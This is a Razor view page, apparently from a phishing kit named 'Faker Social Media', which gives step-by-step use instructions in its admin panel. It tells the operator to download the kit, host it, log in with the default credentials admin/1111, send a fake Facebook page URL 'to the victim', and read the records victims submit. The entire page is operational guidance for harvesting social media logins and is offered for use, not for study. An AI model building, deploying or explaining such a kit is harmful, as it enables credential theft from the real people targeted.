
@{
    ViewData["Title"] = "HowToUse";
    Layout = "~/Views/Shared/_LayoutPanel.cshtml";
}

<h2>How To Use Faker Social Media ?</h2>
<hr />

<div class="card shadow mb-4">
    <div class="card-header py-3">
        <h6 class="m-0 font-weight-bold text-primary">1-) Download Faker Social Media</h6>
    </div>
    <div class="card-body">
        Download link on link below <br /> www.berkekurnaz.com/faker/01.zip
    </div>
</div>
<div class="card shadow mb-4">
    <div class="card-header py-3">
        <h6 class="m-0 font-weight-bold text-primary">2-) Upload To Server</h6>
    </div>
    <div class="card-body">
        Upload the downloaded file to your server
    </div>
</div>
<div class="card shadow mb-4">
            <div class="card-header py-3">
                <h6 class="m-0 font-weight-bold text-primary">3-) Login Your Panel</h6>
            </div>
            <div class="card-body">
                Go to www.yoursite.com/Panel/Login and log in by typing admin as the user name, 1111 in the password.
            </div>
</div>
<div class="card shadow mb-4">
    <div class="card-header py-3">
        <h6 class="m-0 font-weight-bold text-primary">4-) Send The Url To Victim</h6>
    </div>
    <div class="card-body">
        Send the url to the victim. Then you can follow the records here. <br />
        Example Url : www.yoursite.com/facebook
    </div>
</div>
<div class="card shadow mb-4">
    <div class="card-header py-3">
        <h6 class="m-0 font-weight-bold text-primary">5-) Read All Records</h6>
    </div>
    <div class="card-body">
        Read all records sent by victims.
    </div>
</div>